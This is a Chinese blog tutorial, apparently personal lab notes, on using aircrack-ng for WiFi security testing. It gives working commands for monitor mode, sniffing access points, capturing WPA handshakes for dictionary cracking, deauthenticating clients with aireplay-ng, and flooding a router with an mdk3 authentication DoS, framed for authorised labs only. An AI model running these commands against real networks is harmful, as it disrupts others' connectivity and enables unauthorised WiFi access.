aircrack-ng使用简述

学无线安全、做实验环境抓握手包时,Linux 上常用 aircrack-ng 这一套。下面是我当时记在笔记里的命令流水,仅限自有网络或已获授权的环境;未授权扫描、干扰他人 WiFi 违法。

当时环境:Kali / Ubuntu,USB 无线网卡支持 monitor 模式,接口名以 wlan0 为例,实际以 iw devifconfig 为准。

1. 查看网卡

确认网卡名、是否 UP

ifconfig

或:

iw dev

只有支持 monitor 模式的网卡才能做后面的嗅探。

2. 打开网卡混杂模式

Monitor 模式相当于把网卡切成「只听空中帧」的状态,接口名通常会变成 wlan0mon

airmon-ng start wlan0

若提示有进程占用(NetworkManager、wpa_supplicant),可先:

airmon-ng check kill

start。做完实验记得 airmon-ng stop wlan0mon 恢复。

3. 嗅探附近AP

扫描周围 AP、信道、BSSID、关联客户端:

airodump-ng wlan0mon

盯某个目标 AP 时,可指定信道与输出文件,便于后面抓握手:

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

-w capture 会生成 capture-01.cap 等,供 aircrack-ng 跑字典。

4. 发动deauth攻击使目标重连

让客户端断开并重连,便于在握手阶段抓 EAPOL。仍须合法授权。

aireplay-ng -0 [攻击数量] –a [路由器MAC] -c [客户端MAC] wlan0mon

注意:原文里的 –a 可能是全角破折号,命令行请用半角 -a

  1. 攻击数量设为0为无限循环模式

  2. 路口器MAC地址为必填项(应为「路由器」)

  3. 客户端MAC,可不填则对路由器所有的客户端进行攻击

示例:

aireplay-ng -0 5 -a D4:83:04:9F:37:28 -c 客户端MAC wlan0mon

5. 对路由器Dos攻击

mdk3 常与 aircrack-ng 一起装,可做认证洪水等,干扰性强,仅实验室自用

sudo mdk3 mon0 a -a D4:83:04:9F:37:28

mon0 需换成你当前的 monitor 接口名(如 wlan0mon)。a 表示认证 DoS 模式,-a 后跟目标 AP 的 BSSID。

补充

完整破解流程还包括:抓够握手包 → aircrack-ng -w wordlist capture-01.cap 跑字典。本文只记了前期嗅探和 deauth 相关命令,字典与算力那是后话。网卡驱动、内核版本不同,命令报错时先查 airmon-ng 是否识别芯片。

版权声明: 本文首发于 指尖魔法屋-aircrack-ng使用简述https://blog.thinkmoon.cn/post/373-notes-network-aircrack-ng/) 转载或引用必须申明原指尖魔法屋来源及源地址!